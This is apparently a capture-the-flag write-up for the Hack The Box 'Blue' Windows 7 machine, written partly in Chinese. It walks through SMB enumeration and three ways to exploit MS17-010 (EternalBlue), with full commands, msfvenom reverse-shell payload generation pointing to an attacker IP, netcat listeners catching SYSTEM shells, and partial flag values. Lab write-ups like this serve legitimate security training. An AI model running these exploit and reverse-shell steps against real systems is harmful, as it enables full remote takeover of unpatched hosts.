[Hack The Box] Blue – writeup

💀 OS: Windows 💀 Difficulty: Easy 💀 Vulnerability :Remote Code Execution

Scanning and Enumeration:

nmap:

nmap -sC -sV -O 10.10.10.40
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-22 23:47 EDT
Nmap scan report for 10.10.10.40
Host is up (0.17s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open E Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
...
Host script results:
| smb-os-discovery: 
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-08-23T04:48:30+01:00
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -19m58s, deviation: 34m34s, median: 0s
| smb2-security-mode: 
| 2:1:0: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2023-08-23T03:48:26
|_ start_date: 2023-08-23T03:36:24

三個端口是開啟:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open Windows XP microsoft-ds
OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)

445 port :

smbclient -L 10.10.10.40
Password for [WORKGROUP\root]:
Sharename          Type         Comment
---------                 ----           -------
ADMIN$              Disk         Remote Admin
C$                          Disk         Default share
IPC$                      IPC          Remote IPC
Share                     Disk
Users                     Disk

有兩個資料夾可以訪問,但裡面都是空的

smbclient //10.10.10.40/Share 
smbclient //10.10.10.40/Users
--------
smbclient命令 – 存取SMB/CIFS服务器的用户端程序

Vuln

nmap -v -script smb-vuln* -p 135,139,445,49152,49153,49154,49155,49156,49157 10.10.10.4
...
Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/201
...

發現一個漏洞:
✎ms17-010

Exploit:

方法一 – 42315.py

這種方法比較複雜,需要修改exploit當中的代碼

searchsploit ms17-010

....

Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42315.py

....


searchsploit -m windows/remote/42315.py
Exploit: Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
URL: https://www.exploit-db.com/exploits/42315
Path: /usr/share/exploitdb/exploits/windows/remote/42315.py
Codes: CVE-2017-0144
Verified: True
File Type: Python script, ASCII text executable
Copied to: /root/Desktop/HTB/blue/42315.py

1.這份exploit會使用到mysmb,需要額外下載
這邊使用 adithyan-ak 分享的 mysmb
wget https://raw.githubusercontent.com/adithyan-ak/MS17-010-Manual-Exploit/main/mysmb.py
 
2.使用MSFvenom產用帶有 reverse shell的可執行檔案
msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.10.14.11 LPORT=4444 > eternal-blue.exe
 
3.修改exploit當中的代碼,添加可以使用的憑證
enum4linux -a 10.10.10.40
使用enum4linux 可以檢查出受害機已知的使用者當中有 'guest'
#36 USERNAME = 'guest'
#37  PASSWORD = ''
...
#922 smb_send_file(smbConn, /root/Desktop/HTB/blue/eternal-blue.exe, 'C', '/ternal-blue.exe')
#923  service_exec(conn, r'cmd /c c:\eternal-blue.exe')

Run Exploit:

┌──(root㉿kali)-[~/Desktop/HTB/blue]
└─# python2 42315.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
Using named pipe: wkssvc
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa80042f52e0
SESSION: 0xfffff8a0020618e0
FLINK: 0xfffff8a0021e7088
InParam: 0xfffff8a0021e115c
MID: 0x1203
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
creating file c:\pwned.txt on the target
Opening SVCManager on 10.10.10.40.....
Creating service Mvcv.....
Starting service Mvcv.....
The NETBIOS connection with the remote host timed out.
Removing service Mvcv.....
ServiceExec Error on: 10.10.10.40
nca_s_proto_error
Done

接收reverse shell:

┌──(root㉿kali)-[~]
└─# rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

方法二 – AUTOBLUE

git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
使用 shell_prep.sh 填入對應的參數,可以自動產生shellcodes
┌──(root㉿kali)-[~/…/HTB/blue/AutoBlue-MS17-010/shellcode]
└─# ./shell_prep.sh 
                 _.-;;-._
          '-..-'|   ||   |
          '-..-'|_.-;;-._|
          '-..-'|   ||   |
          '-..-'|_.-''-._|   
Eternal Blue Windows Shellcode Compiler

Let's compile them windoos shellcodezzz

Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
Y
LHOST for reverse connection:
10.10.14.11
LPORT you want x64 to listen on:
5555
LPORT you want x86 to listen on:
5555
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...

msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.10.14.11 LPORT=5555
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin

Generating x86 cmd shell (stageless)...

msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.14.11 LPORT=5555
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin

MERGING SHELLCODE WOOOO!!!
DONE

Run Exploit:

┌──(root㉿kali)-[~/Desktop/HTB/blue/AutoBlue-MS17-010]
└─# python2 eternalblue_exploit7.py 10.10.10.40 ./shellcode/sc_x64.bin
shellcode size: 1232
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

接收reverse shell:

┌──(root㉿kali)-[~]
└─# rlwrap nc -lnvp 9999
listening on [any] 9999 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

方法三 – send_and_execute.py

git clone https://github.com/helviojunior/MS17-010.git
修改send_and_execute.py
#36 USERNAME = 'guest'

使用MSFvenom產用帶有 reverse shell的可執行檔案
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.11 LPORT=4444 EXITFUNC=thread -f exe -a x86 — platform windows -o ms17–010.exe

Run Exploit:

┌──(root㉿kali)-[~/…/HTB/blue/3.MS17-010/MS17-010]
└─# python2 send_and_execute.py 10.10.10.40 ../ms17–010.exe 
Trying to connect to 10.10.10.40:445
Target OS: Windows 7 Professional 7601 Service Pack 1
Using named pipe: browser
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa8004328020
SESSION: 0xfffff8a003549060
FLINK: 0xfffff8a0005cd088
InParam: 0xfffff8a0005c715c
MID: 0x1e03
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
Sending file URAL4Y.exe...
Opening SVCManager on 10.10.10.40.....
Creating service GAJh.....
Starting service GAJh.....
The NETBIOS connection with the remote host timed out.
Removing service GAJh.....
ServiceExec Error on: 10.10.10.40
nca_s_proto_error
Done

接收reverse shell:

┌──(root㉿kali)-[~]
└─# rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

Get FLAG:

C:\Windows\system32>cd \users

C:\Users>dir
Volume in drive C has no label.
Volume Serial Number is A0EF-1911

Directory of C:\Users

21/07/2017 07:56 <DIR> .
21/07/2017 07:56 <DIR> ..
21/07/2017 07:56 <DIR> Administrator
14/07/2017 14:45 <DIR> haris
12/04/2011 08:51 <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 17,256,050,688 bytes free

C:\Users>type administrator\desktop\root.txt
ff548eb7...
C:\Users>type haris\desktop\user.txt
4c546aea...